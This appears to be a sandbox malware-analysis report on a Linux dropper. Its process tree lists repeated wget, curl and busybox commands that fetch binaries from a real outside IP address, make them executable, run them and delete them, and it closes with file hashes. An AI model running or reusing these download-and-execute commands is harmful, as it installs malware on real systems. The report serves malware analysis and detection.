/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:954
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:960
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Reads runtime system information
PID:965
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97